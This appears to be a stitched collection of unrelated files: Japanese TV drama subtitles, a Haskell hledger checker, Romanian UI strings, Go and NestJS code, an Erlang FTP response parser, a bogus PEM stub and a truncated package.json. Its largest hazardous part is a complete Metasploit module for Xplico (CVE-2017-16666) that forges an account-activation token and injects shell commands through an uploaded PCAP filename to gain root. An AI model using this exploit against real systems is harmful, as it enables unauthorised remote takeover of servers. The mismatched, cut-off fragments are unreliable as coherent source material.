00:38:55,879 --> 00:38:58,879
404
00:40:30,874 --> 00:40:48,208
405
00:40:48,208 --> 00:40:51,978
(直美)新田のお母さんが
倒れたのは 品川区。
406
00:40:51,978 --> 00:40:54,347
(岩城)
赤が中川さん 青が本田さん。➡
407
00:40:54,347 --> 00:40:56,966
野村先生の行動は黄色で引きます。
408
00:40:56,966 --> 00:41:02,439
(直美)野村先生は自宅から
品川区橋本町にある結婚式場に➡
409
00:41:02,439 --> 00:41:04,908
自家用車で向かった。➡
410
00:41:04,908 --> 00:41:10,346
結婚式は午後2時からだったのに
1時間遅れて到着した。
411
00:41:10,346 --> 00:41:15,552
午後3時ごろ 3人共
同じ品川区にいた。
412
00:41:15,552 --> 00:41:17,303
近いよね。
413
00:41:17,303 --> 00:41:19,789
これって
どういうことなんだろう…。
414
00:41:19,789 --> 00:41:24,044
直美さん 母さんが倒れた場所
行ってきました。
415
00:41:24,044 --> 00:41:26,546
思ったんですけど
あそこで倒れたら 普通は➡
416
00:41:26,546 --> 00:41:29,349
港南総合病院に運ばれますよね?
417
00:41:29,349 --> 00:41:32,049
じゃあ 何で港区の病院に
運ばれたんだろうって。
418
00:41:33,887 --> 00:41:37,057
(直美)港区の病院…。
419
00:41:37,057 --> 00:41:39,159
港南総合病院…。
420
00:41:39,159 --> 00:41:40,759
ぶっ!
421
00:41:58,878 --> 00:42:07,303
422
00:42:07,303 --> 00:42:19,883
♬~
423
00:42:19,883 --> 00:42:21,634
⦅はぁ~。⦆
424
00:42:21,634 --> 00:42:24,220
(恵)⦅うん 大丈夫。⦆
425
00:42:24,220 --> 00:42:27,874
⦅薄味も
きっと そのうち慣れるわよ。⦆
426
00:42:27,874 --> 00:42:30,710
⦅そうかな?⦆
⦅健康のためなんだから➡
427
00:42:30,710 --> 00:42:32,610
私も工夫するわ。⦆
428
00:42:34,614 --> 00:42:37,700
⦅ただいま。⦆
⦅おぉ おかえり 和繁。⦆
429
00:42:37,700 --> 00:42:40,303
(和繁)
⦅ねえ 父さん 週末 テニス行く?⦆
430
00:42:40,303 --> 00:42:43,823
⦅おう。⦆
(恵)⦅あぁ~ 私も~!⦆
431
00:42:43,823 --> 00:42:45,475
(須藤)⦅はい はい。 はははっ。⦆
432
00:42:45,475 --> 00:42:47,177
(和繁)⦅母さんも
もう若くないんだから➡
433
00:42:47,177 --> 00:42:50,480
あんまり無理しないでよ。⦆
⦅ひと言 余計です。⦆
434
00:42:50,480 --> 00:42:53,316
(一同)⦅ははははっ…。⦆
435
00:42:53,316 --> 00:43:02,316
♬~
436
00:43:21,878 --> 00:43:27,217
437
00:43:27,217 --> 00:43:35,175
♬~
438
00:43:35,175 --> 00:43:38,494
(直美)サキさんて
中川さんが退院したあとに➡
439
00:43:38,494 --> 00:43:40,713
港南総合病院に移ってるんだよね。
440
00:43:40,713 --> 00:43:45,718
はい。 姉ちゃん 母さんが5人の
男に殺されたっていうことを➡
441
00:43:45,718 --> 00:43:48,221
港南総合病院の理事長に
話したみたいなんです。
442
00:43:48,221 --> 00:43:53,293
えっ? 何で そんなわざわざ
自分の首を絞めるようなこと。
443
00:43:53,293 --> 00:43:55,945
あえて そう言ったってこと?
444
00:43:55,945 --> 00:43:58,448
それって…。
445
00:43:58,448 --> 00:44:00,648
宣戦布告。
446
00:44:02,418 --> 00:44:05,355
その理事長
4人目のターゲットかも。
447
00:44:05,355 --> 00:44:24,874
♬~
448
00:44:24,874 --> 00:44:36,119
♬~
449
00:44:36,119 --> 00:44:37,787
う~ん!
450
00:44:37,787 --> 00:44:56,889
♬~
451
00:44:56,889 --> 00:45:16,876
♬~
452
00:45:16,876 --> 00:45:22,365
♬~
453
00:45:22,365 --> 00:45:24,600
ぶっ!
454
00:45:24,600 --> 00:45:27,270
ぶっ!
455
00:45:27,270 --> 00:45:29,072
ぶぅ~~!
456
00:45:29,072 --> 00:45:48,891
♬~
457
00:45:48,891 --> 00:46:08,878
♬~
458
00:46:08,878 --> 00:46:20,089
♬~
459
00:46:20,089 --> 00:46:21,741
ぶぅ~~!
460
00:46:21,741 --> 00:46:40,877
♬~
461
00:46:40,877 --> 00:46:47,377
♬~
462
00:47:05,201 --> 00:47:24,887
♬~
463
00:47:24,887 --> 00:47:44,874
♬~
464
00:47:44,874 --> 00:48:04,894
♬~
465
00:48:04,894 --> 00:48:24,881
♬~
466
00:48:24,881 --> 00:48:44,867
♬~
467
00:48:44,867 --> 00:49:04,887
♬~
468
00:49:04,887 --> 00:49:24,874
♬~
469
00:49:24,874 --> 00:49:34,274
♬~
470
00:49:49,098 --> 00:49:52,602
[TEL](留守番電話のアナウンス)
最初の新しいメッセージです。
471
00:49:52,602 --> 00:49:54,270
[TEL](留守番電話)姉ちゃん…。
472
00:49:54,270 --> 00:49:56,272
♬「Catch Me -If you wanna-」
473
00:49:56,272 --> 00:50:12,355
♬~
474
00:50:12,355 --> 00:50:16,592
姉ちゃんは… 知ってたんだね…。
475
00:50:16,592 --> 00:50:29,088
♬~
476
00:50:29,088 --> 00:50:33,843
♬~
477
00:50:33,843 --> 00:50:38,114
俺が… 母さんを…。
478
00:50:38,114 --> 00:50:57,867
♬~
479
00:50:57,867 --> 00:51:02,588
♬~
480
00:51:02,588 --> 00:51:04,388
母さんを…。
481
00:51:08,244 --> 00:51:09,979
殺したことを…。
482
00:51:09,979 --> 00:51:29,882
♬~
483
00:51:29,882 --> 00:51:34,904
♬~
484
00:51:34,904 --> 00:51:42,978
♬~
485
00:51:42,978 --> 00:51:44,814
(直美)あと1人 残ってる。
486
00:51:44,814 --> 00:51:47,383
(岩城)野村先生 中川さん 本田…。
487
00:51:47,383 --> 00:51:49,885
何かがあった…。
絶対に教えない。
488
00:51:49,885 --> 00:51:52,121
俺は姉ちゃんの大事な人を奪った。
489
00:51:52,121 --> 00:51:55,821
このワインね
どちらかを飲むと 死ぬの。
490
00:51:57,877 --> 00:52:10,677
491
00:52:12,892 --> 00:52:15,092
お母さんへ。
姉ちゃん!
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env stack
-- stack script --compile --resolver lts-16.3
{-
hledger-check-tag-files stack script.
Read the default journal and give an error if any tag values
containing '/' do not exist as file paths.
Usage:
$ hledger-check-tag-files.hs # compiles if needed
or:
$ hledger check-tag-files # compiles if there's no compiled version
-}
import Control.Monad
import qualified Data.Text as T
import Hledger.Cli
import System.Directory
import System.Exit
-- | Read the default journal, collect every tag whose value contains a
-- slash (and is therefore treated as a file path), and exit with an
-- error message on the first such path that does not exist on disk.
main :: IO ()
main = withJournalDo defcliopts $ \journal -> do
  let pathTags =
        [ (T.unpack name, T.unpack value)
        | (name, value) <- concatMap transactionAllTags (jtxns journal)
        , '/' `elem` T.unpack value
        ]
  forM_ pathTags $ \(name, path) -> do
    found <- doesFileExist path
    unless found $ do
      putStrLn ("file not found in tag: " ++ name ++ ": " ++ path)
      exitFailure
| {
"pile_set_name": "Github"
} |
{
"sessions": {
"title": "Sesiuni active pentru [<strong>{{username}}</strong>]",
"table": {
"ipaddress": "Adresa IP",
"useragent": "User Agent",
"date": "Data",
"button": "Invalidare"
},
"messages": {
"success": "<strong>Sesiune invalidată!</strong>",
"error": "<strong>Eroare!</strong> Sesiunea nu a putut fi invalidată."
}
}
}
| {
"pile_set_name": "Github"
} |
// Copyright 2014 Canonical Ltd.
// Licensed under the LGPLv3, see LICENCE file for details.
package utils_test
import (
"os"
"github.com/juju/testing"
gc "gopkg.in/check.v1"
"github.com/juju/utils/v2"
)
// gomaxprocsSuite exercises utils.UseMultipleCPUs with the GOMAXPROCS and
// NumCPU functions patched out (see SetUpTest), so the tests never change
// the real scheduler settings.
type gomaxprocsSuite struct {
	testing.IsolationSuite
	setmaxprocs    chan int // NOTE(review): appears unused in this file — confirm before removing
	numCPUResponse int      // value the stubbed NumCPU reports
	setMaxProcs    int      // records the argument passed to the stubbed GOMAXPROCS
}

// Register the suite with gocheck.
var _ = gc.Suite(&gomaxprocsSuite{})
// SetUpTest replaces runtime GOMAXPROCS/NumCPU with stubs so nothing real
// is changed; the value handed to GOMAXPROCS is captured in s.setMaxProcs
// for the tests to inspect. It also clears the GOMAXPROCS env var.
func (s *gomaxprocsSuite) SetUpTest(c *gc.C) {
	s.IsolationSuite.SetUpTest(c)
	// Always stub out GOMAXPROCS so we don't actually change anything.
	s.numCPUResponse = 2
	s.setMaxProcs = -1
	s.PatchValue(utils.GOMAXPROCS, func(n int) int {
		s.setMaxProcs = n
		return 1
	})
	s.PatchValue(utils.NumCPU, func() int { return s.numCPUResponse })
	s.PatchEnvironment("GOMAXPROCS", "")
}
// TestUseMultipleCPUsDoesNothingWhenGOMAXPROCSSet verifies that an explicit
// GOMAXPROCS environment variable disables the automatic adjustment.
func (s *gomaxprocsSuite) TestUseMultipleCPUsDoesNothingWhenGOMAXPROCSSet(c *gc.C) {
	os.Setenv("GOMAXPROCS", "1")
	utils.UseMultipleCPUs()
	// NOTE(review): SetUpTest seeds setMaxProcs with -1, so expecting 0 here
	// implies UseMultipleCPUs still calls the stub with n=0 (a pure query
	// that changes nothing) — confirm against the utils implementation.
	c.Check(s.setMaxProcs, gc.Equals, 0)
}
// TestUseMultipleCPUsWhenEnabled verifies that, without a GOMAXPROCS env
// override, UseMultipleCPUs sets GOMAXPROCS to the reported CPU count and
// tracks changes to that count on subsequent calls.
func (s *gomaxprocsSuite) TestUseMultipleCPUsWhenEnabled(c *gc.C) {
	utils.UseMultipleCPUs()
	c.Check(s.setMaxProcs, gc.Equals, 2) // stubbed NumCPU reports 2
	s.numCPUResponse = 4
	utils.UseMultipleCPUs()
	c.Check(s.setMaxProcs, gc.Equals, 4)
}
| {
"pile_set_name": "Github"
} |
import { Module } from '@nestjs/common';
import { TypeOrmModule } from '@nestjs/typeorm';
import { CandidateInterviewService } from './candidate-interview.service';
import { CandidateInterviewController } from './candidate-interview.controller';
import { CandidateInterview } from './candidate-interview.entity';
import { UserService } from '../user/user.service';
import { User } from '../user/user.entity';
/**
 * Wires up the candidate-interview feature: registers the TypeORM
 * repositories for CandidateInterview and User, provides
 * CandidateInterviewService (re-exported for other modules) together with
 * UserService, and mounts CandidateInterviewController.
 */
@Module({
	imports: [TypeOrmModule.forFeature([CandidateInterview, User])],
	providers: [CandidateInterviewService, UserService],
	controllers: [CandidateInterviewController],
	exports: [CandidateInterviewService]
})
export class CandidateInterviewModule {}
| {
"pile_set_name": "Github"
} |
3 2
50 85 250
10 15 25
3 6
50 85 250
10 15 25
8 1
10 20 30 40 50 60 70 80
8 10 58 63 71 72 75 76
| {
"pile_set_name": "Github"
} |
%%
%% %CopyrightBegin%
%%
%% Copyright Ericsson AB 2005-2018. All Rights Reserved.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% %CopyrightEnd%
%%
%%
%% Description: This module implements handling of FTP server responses.
-module(ftp_response).
%% Internal API
-export([parse_lines/3, interpret/1, error_string/1]).
-include("ftp_internal.hrl").
%% First group of reply code digits
-define(POS_PREL, 1).
-define(POS_COMPL, 2).
-define(POS_INTERM, 3).
-define(TRANS_NEG_COMPL, 4).
-define(PERM_NEG_COMPL, 5).
%% Second group of reply code digits
-define(SYNTAX,0).
-define(INFORMATION,1).
-define(CONNECTION,2).
-define(AUTH_ACC,3).
-define(UNSPEC,4).
-define(FILE_SYSTEM,5).
%%%=========================================================================
%%% INTERNAL API
%%%=========================================================================
%%--------------------------------------------------------------------------
%% parse_lines(Data, AccLines, StatusCode) -> {ok, Lines} |
%% {continue, {Data,
%% AccLines, StatusCode}}
%%
%% Data = binary() - data recived on the control connection from the
%% ftp-server.
%% AccLines = [string()]
%% StatusCode = start | {byte(), byte(), byte()} | finish -
%% Indicates where in the parsing process we are.
%% start - (looking for the status code of the message)
%% {byte(), byte(), byte()} - status code found, now
%% looking for the last line indication.
%% finish - now on the last line.
%% Description: Parses a ftp control response message.
%% "A reply is defined to contain the 3-digit code, followed by Space
%% <SP>, followed by one line of text (where some maximum line length
%% has been specified), and terminated by the Telnet end-of-line
%% code (CRLF), or a so called multilined reply for example:
%%
%% 123-First line
%% Second line
%% 234 A line beginning with numbers
%% 123 The last line
%%
%% The user-process then simply needs to search for the second
%% occurrence of the same reply code, followed by <SP> (Space), at
%% the beginning of a line, and ignore all intermediary lines. If
%% an intermediary line begins with a 3-digit number, the Server
%% will pad the front to avoid confusion.
%%--------------------------------------------------------------------------
%% Make sure we have received the first 4 bytes so we know how to parse
%% the FTP server response, i.e. whether the response is composed of one
%% line or multiple lines.
%% Not enough data to read even the 3-digit status code; ask for more.
parse_lines(Bin, Lines, start) when size(Bin) < 4 ->
    {continue, {Bin, Lines, start}};
%% "xyz-" introduces a multi-line reply; remember the code digits so we
%% can spot the terminating "xyz " line later.
parse_lines(<<C1, C2, C3, $-, Rest/binary>>, Lines, start) ->
    parse_lines(Rest, [$-, C3, C2, C1 | Lines], {C1, C2, C3});
%% "xyz " means a single-line reply; go straight to the last-line state.
parse_lines(<<C1, C2, C3, ?WHITE_SPACE, Bin/binary>>, Lines, start) ->
    parse_lines(Bin, [?WHITE_SPACE, C3, C2, C1 | Lines], finish);
%% CRLF followed by "xyz " (same code digits) starts the last line of a
%% multi-line reply.
parse_lines(<<?CR, ?LF, C1, C2, C3, ?WHITE_SPACE, Rest/binary>>, Lines, {C1, C2, C3}) ->
    parse_lines(Rest, [?WHITE_SPACE, C3, C2, C1, ?LF, ?CR | Lines], finish);
%% Potential end found; wait for more data to disambiguate.
parse_lines(<<?CR, ?LF, C1, C2, C3>> = Bin, Lines, {C1, C2, C3}) ->
    {continue, {Bin, Lines, {C1, C2, C3}}};
%% Intermediate line beginning with the status code (server pads such
%% lines to avoid confusion) — still inside the multi-line reply.
parse_lines(<<?CR, ?LF, C1, C2, C3, Rest/binary>>, Lines, {C1, C2, C3}) ->
    parse_lines(Rest, [C3, C2, C1, ?LF, ?CR | Lines], {C1, C2, C3});
%% Potential last line (suffix of CRLF + code prefix); wait for more data.
parse_lines(<<?CR, ?LF, C1, C2>> = Data, Lines, {C1, C2, _} = StatusCode) ->
    {continue, {Data, Lines, StatusCode}};
parse_lines(<<?CR, ?LF, C1>> = Data, Lines, {C1, _, _} = StatusCode) ->
    {continue, {Data, Lines, StatusCode}};
parse_lines(<<?CR, ?LF>> = Data, Lines, {_,_,_} = StatusCode) ->
    {continue, {Data, Lines, StatusCode}};
parse_lines(<<?LF>> = Data, Lines, {_,_,_} = StatusCode) ->
    {continue, {Data, Lines, StatusCode}};
parse_lines(<<>> = Data, Lines, {_,_,_} = StatusCode) ->
    {continue, {Data, Lines, StatusCode}};
%% Ordinary byte inside the multi-line reply: accumulate (Lines is built
%% in reverse).
parse_lines(<<Octet, Rest/binary>>, Lines, {_,_, _} = StatusCode) ->
    parse_lines(Rest, [Octet | Lines], StatusCode);
%% End of the FTP server response found.
parse_lines(<<?CR, ?LF>>, Lines, finish) ->
    {ok, lists:reverse([?LF, ?CR | Lines]), <<>>};
parse_lines(<<?CR, ?LF, Rest/binary>>, Lines, finish) ->
    {ok, lists:reverse([?LF, ?CR | Lines]), Rest};
%% Potential end found; wait for more data.
parse_lines(<<?CR>> = Data, Lines, finish) ->
    {continue, {Data, Lines, finish}};
parse_lines(<<>> = Data, Lines, finish) ->
    {continue, {Data, Lines, finish}};
%% Ordinary byte on the last line: accumulate.
parse_lines(<<Octet, Rest/binary>>, Lines, finish) ->
    parse_lines(Rest, [Octet | Lines], finish).
%%--------------------------------------------------------------------------
%% interpret(Lines) -> {Status, Text}
%% Lines = [byte(), byte(), byte() | Text] - ftp server response as
%% returned by parse_lines/3
%% Stauts = atom() (see interpret_status/3)
%% Text = [string()]
%%
%% Description: Create nicer data to match on.
%%--------------------------------------------------------------------------
%% Turn a raw reply "<D1><D2><D3>..." (as produced by parse_lines/3) into
%% {StatusAtom, Text}, where StatusAtom classifies the 3-digit reply code
%% (see interpret_status/3) and Text is the remainder of the message.
interpret([Digit1, Digit2, Digit3 | Text]) ->
    Status = interpret_status(Digit1 - $0, Digit2 - $0, Digit3 - $0),
    {Status, Text}.
%%--------------------------------------------------------------------------
%% error_string(Error) -> string()
%% Error = {error, term()} | term()
%%
%% Description: Translates error codes into strings intended for
%% human interpretation.
%%--------------------------------------------------------------------------
%% Translate an error reason (atom or {error, Reason} tuple) into a string
%% intended for human interpretation. The tuple clause must stay first and
%% the catch-all last; the atom clauses in between are mutually exclusive
%% and are kept in alphabetical order.
error_string({error, Reason}) ->
    error_string(Reason);
error_string(echunk)     -> "Synchronisation error during chunk sending.";
error_string(eclosed)    -> "Session has been closed.";
error_string(econn)      -> "Connection to remote server prematurely closed.";
error_string(eexists)    -> "File or directory already exists.";
error_string(efnamena)   -> "File name not allowed.";
error_string(ehost)      -> "Host not found, FTP server not found, "
                            "or connection rejected.";
error_string(elogin)     -> "User not logged in.";
error_string(enofile)    -> "No files found or file unavailable";
error_string(enotbinary) -> "Term is not a binary.";
error_string(epath)      -> "No such file or directory, already exists, "
                            "or permission denied.";
error_string(epnospc)    -> "Exceeded storage allocation "
                            "(for current directory or dataset).";
error_string(etnospc)    -> "Insufficient storage space in system.";
error_string(etype)      -> "No such type.";
error_string(euser)      -> "User name or password not valid.";
error_string(Reason) ->
    lists:flatten(io_lib:format("Unknown error: ~w", [Reason])).
%%%========================================================================
%%% Internal functions
%%%========================================================================
%% Positive Preleminary Reply
interpret_status(?POS_PREL,_,_) -> pos_prel;
%%FIXME ??? 3??? interpret_status(?POS_COMPL, ?AUTH_ACC, 3) -> tls_upgrade;
interpret_status(?POS_COMPL, ?AUTH_ACC, 4) -> tls_upgrade;
%% Positive Completion Reply
interpret_status(?POS_COMPL,_,_) -> pos_compl;
%% Positive Intermediate Reply nedd account
interpret_status(?POS_INTERM,?AUTH_ACC,2) -> pos_interm_acct;
%% Positive Intermediate Reply
interpret_status(?POS_INTERM,_,_) -> pos_interm;
%% No files found or file not available
interpret_status(?TRANS_NEG_COMPL,?FILE_SYSTEM,0) -> enofile;
%% No storage area no action taken
interpret_status(?TRANS_NEG_COMPL,?FILE_SYSTEM,2) -> etnospc;
%% Temporary Error, no action taken
interpret_status(?TRANS_NEG_COMPL,_,_) -> trans_neg_compl;
%% Permanent disk space error, the user shall not try again
interpret_status(?PERM_NEG_COMPL,?FILE_SYSTEM,0) -> epath;
interpret_status(?PERM_NEG_COMPL,?FILE_SYSTEM,2) -> epnospc;
interpret_status(?PERM_NEG_COMPL,?FILE_SYSTEM,3) -> efnamena;
interpret_status(?PERM_NEG_COMPL,?AUTH_ACC,0) -> elogin;
interpret_status(?PERM_NEG_COMPL,_,_) -> perm_neg_compl.
| {
"pile_set_name": "Github"
} |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Xplico Remote Code Execution',
'Description' => %q{
This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal
command under the context of the root user.
The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet
traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create
a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try
to send e-mail that contains activation code. Unfortunetly, this e-mail probably not gonna reach to the given e-mail address on most of installation.
But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage.
One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum
of the file. Name of the for this operation is direclty taken from user input and then used at inside of the command without proper input validation.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <[email protected]>' # author & msf module
],
'References' =>
[
['CVE', '2017-16666'],
['URL', 'https://pentest.blog/advisory-xplico-unauthenticated-remote-code-execution-cve-2017-16666/'],
['URL', 'https://www.xplico.org/archives/1538']
],
'Privileged' => true,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'DefaultOptions' =>
{
'RPORT' => 9876
},
'Payload' =>
{
'Space' => 252,
'DisableNops' => true,
'BadChars' => "\x2f\x22",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat gawk', # other cmd payloads can't fit within 252 space due to badchars.
},
},
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Oct 29 2017',
'DefaultTarget' => 0
))
end
def check
# There is no exact way to understand validity of vulnerability without registering new user as well as trigger the command injection.
# which is not something we want to do for only check..!
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'users', 'register'),
)
if res && res.code == 302
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Unknown
end
end
def initiate_session
print_status('Initiating new session on server side')
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
)
if res && res.code == 200
res.get_cookies
else
nil
end
end
def register_user(username, password)
# First thing first, we need to get csrf token from registration form.
print_status('Registering a new user')
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'users', 'register'),
'cookie' => @cookie
)
if res && res.code == 200
csrf_token = res.get_hidden_inputs.first['data[_Token][key]'] || nil
fields = res.get_hidden_inputs.first['data[_Token][fields]'] || nil
end
if csrf_token.nil? || fields.nil?
fail_with(Failure::Unknown, 'Unable to extact hidden fields from registration form.')
end
# rand_mail_address sometimes generates buggy email address for this app. So we manually generate email address in here.
email = ''
email << rand_text_alpha_lower(rand(10)+4)
email << '@'
email << rand_text_alpha_lower(rand(10)+4)
email << '.'
email << rand_text_alpha_lower(rand(1)+2)
# Create user
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'users', 'register'),
'cookie' => @cookie,
'vars_post' => {
'_method' => 'POST',
'data[_Token][key]' => csrf_token,
'data[User][email]' => email,
'data[User][username]' => username,
'data[User][password]' => password,
'data[_Token][fields]' => fields,
'data[_Token][unlocked]' => '',
}
)
if res && res.code == 302
print_good('New user successfully registered')
print_status("Username: #{username}")
print_status("Password: #{password}")
else
fail_with(Failure::Unknown, 'Could not register new user')
end
# Awesome. We have user. We need to activate it manually..!
print_status('Calculating em_key code of the user')
unixtime = Time.parse(res.headers['Date']).to_i
password_md5 = Rex::Text.md5(password)
em_key = Rex::Text.md5(
"#{email}#{password_md5}#{unixtime}"
)
print_status("Activating user with em_key = #{em_key}")
# We need to follow redirections. Even if we managed to find em_key.
# It will redirect us to the login form. We need to see registration completed on final page.
res = send_request_cgi!(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'users', 'registerConfirm', em_key),
'cookie' => @cookie
)
if res && res.code == 200 && res.body.include?('Registration Completed.')
print_good('User successfully activated')
else
fail_with(Failure::Unknown, 'Could not activated our user. Target may not be vulnerable.')
end
end
def login(username, password)
# yet another csrf token gathering.
print_status('Authenticating with our activated new user')
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
'cookie' => @cookie
)
if res && res.code == 200
csrf_token = res.get_hidden_inputs.first['data[_Token][key]'] || nil
fields = res.get_hidden_inputs.first['data[_Token][fields]'] || nil
end
if csrf_token.nil? || fields.nil?
fail_with(Failure::Unknown, 'Unable to extact hidden fields from login form.')
end
res = send_request_cgi!(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
'cookie' => @cookie,
'vars_post' => {
'_method' => 'POST',
'data[_Token][key]' => csrf_token,
'data[User][username]' => username,
'data[User][password]' => password,
'data[_Token][fields]' => fields,
'data[_Token][unlocked]' => '',
}
)
if res && res.body.include?('<a href="/pols">Cases</a>')
print_good('Successfully authenticated')
else
fail_with(Failure::Unknown, 'Unable to login.')
end
end
def create_new_case
# We logged in. Not we need to create a new xplico case.
print_status('Creating new case')
pol_name = rand_text_alpha_lower(rand(4)+8)
res = send_request_cgi!(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'pols', 'add'),
'cookie' => @cookie,
'vars_post' => {
'_method' => 'POST',
'data[Capture][Type]' => 0,
'data[Pol][name]' => pol_name,
'data[Pol][external_ref]' => '',
}
)
if res && res.body.include?('The Case has been created')
res.body.scan(/<a href="\/pols\/view\/([0-9]+)">/).flatten[0]
else
nil
end
end
def create_new_sol(pol_id)
  # With a case in hand, spawn an Xplico "session" (sol) bound to it and
  # return the new sol id, or nil on failure.
  print_status('Creating new xplico session for pcap')
  session_name = rand_text_alpha_lower(rand(4) + 8)
  # sols/add resolves the active case through server-side session state, so
  # visit the case view first to stash pol_id into our server session.
  send_request_cgi!(
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, 'pols', 'view', pol_id),
    'cookie' => @cookie,
  )
  res = send_request_cgi!(
    'method' => 'POST',
    'uri' => normalize_uri(target_uri.path, 'sols', 'add'),
    'cookie' => @cookie,
    'vars_post' => {
      '_method' => 'POST',
      'data[Sol][name]' => session_name,
    }
  )
  return nil unless res && res.body.include?('The Session has been created')

  res.body.scan(/<a href="\/sols\/view\/([0-9]+)">/).flatten.first
end
def upload_pcap(sol_id)
# Upload the malformed PCAP that triggers CVE-2017-16666 and poll decoding
# status. The command injection fires when Xplico shells out using the
# attacker-controlled filename (back-ticks wrapping payload.encoded).
#
# @param sol_id [String] id of the xplico session created by create_new_sol
print_status('Uploading malformed PCAP file')
# We are hitting this end-point so we can access sol_id through session on server-side.
send_request_cgi!(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'sols', 'view', sol_id),
'cookie' => @cookie,
)
# Read the malformed PCAP template shipped in the framework's data dir.
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2017-16666', 'dump.pcap')
fd = ::File.open( path, 'rb')
pcap = fd.read(fd.stat.size)
fd.close
# Build the multipart body: CakePHP method override plus the PCAP part
# whose filename carries the back-tick command injection.
data = Rex::MIME::Message.new
data.add_part('POST', nil, nil, 'form-data; name="_method"')
data.add_part(pcap, 'application/octet-stream', nil, "form-data; name=\"data[Sols][File]\"; filename=\"`#{payload.encoded})`\"") # Yes back-tick injection!
# Uploading PCAP file.
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'sols', 'pcap'),
'cookie' => @cookie,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
)
# A 302 redirect means the upload was accepted and decoding was queued.
if res && res.code == 302
print_good('PCAP successfully uploaded. Pcap parser is going to start on server side.')
end
# We can not wait all the day long to have session.
# So we are checking status of decoding process 5 times with sleep for a 1 second on each loop.
is_job_done = nil
counter = 0
until session_created? || !is_job_done.nil? || counter == 5
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'sols', 'view', sol_id),
'cookie' => @cookie,
)
if res && res.body.include?('File uploaded, wait start decoding...')
print_status('Parsing has started. Wait for parser to get the job done...')
end
if res && res.body.include?('DECODING')
print_good('We are at PCAP decoding phase. Little bit more patience...')
end
# Tbh decoding process is not going to be finished as long as we have msf session.
# We are not going to see this case if we are successful exploiting.
if res && res.body.include?('DECODING COMPLETED')
print_warning('PCAP parsing process has finished. Haven\'t you got your shell ?')
is_job_done = 1
next
end
sleep(1)
counter += 1
end
end
def exploit
  # Main flow: session cookie -> register -> activate -> login -> case ->
  # xplico session (sol) -> malicious PCAP upload (command injection).
  if check == Exploit::CheckCode::Safe
    fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
  end
  # The cookie is needed by every helper method, so keep it in an ivar.
  @cookie = initiate_session
  if @cookie.nil?
    fail_with(Failure::Unknown, 'Unable to initiate new sessionid on server.')
  end
  # Credentials are only needed by register_user/login; keep them local.
  password = rand_text_alpha(32)
  username = rand_text_alpha_lower(rand(8) + 8)
  register_user(username, password)
  login(username, password)
  # A case id (pol_id) is required before an xplico session can be created.
  pol_id = create_new_case
  if pol_id.nil?
    fail_with(Failure::Unknown, 'Unable to create New Case.')
  end
  print_good("New Case successfully created. Our pol_id = #{pol_id}")
  # Create the xplico session tied to that case.
  sol_id = create_new_sol(pol_id)
  if sol_id.nil?
    fail_with(Failure::Unknown, 'Unable to create New Sol.')
  end
  print_good("New Sols successfully created. Our sol_id = #{sol_id}")
  # Upload the malformed PCAP; the authenticated command injection fires here.
  upload_pcap(sol_id)
end
end
| {
"pile_set_name": "Github"
} |
-----BEGIN CERTIFICATE-----
MII=
MII=
MII= | {
"pile_set_name": "Github"
} |
// Flow libdef stub: treat everything exported by the 'react-modal' package
// as untyped (any) so Flow does not error on its imports.
declare module 'react-modal' {
declare module.exports: any;
}
| {
"pile_set_name": "Github"
} |
{
"name": "angular",
"version": "0.0.0",
"license": "MIT",
"scripts": {
"ng": "ng",
"start": "ng serve",
"build": "ng build --prod",
"test": "ng test",
"lint": "ng lint",
"e2e": "ng e2e"
},
"private": true,
"dependencies": {
"@angular/animations": "^5.2.0",
"@angular/common": "^5.2.0",
"@angular/compiler": "^5.2.0",
"@angular/core": "^5.2.0",
"@angular/forms": "^5.2.0",
"@angular/http": "^5.2.0",
"@angular/platform-browser": "^5.2.0",
"@angular/platform-browser-dynamic": "^5.2.0",
"@angular/router": "^5.2.0",
"core-js": "^2.4.1",
"rxjs": "^5.5.6",
"zone.js": "^0.8.19"
},
"devDependencies": {
"@angular/cli": "~1.7.1",
"@angular/compiler-cli": "^5.2.0",
"@angular/language-service": "^5.2.0",
"@types/jasmine": "~2.8.3",
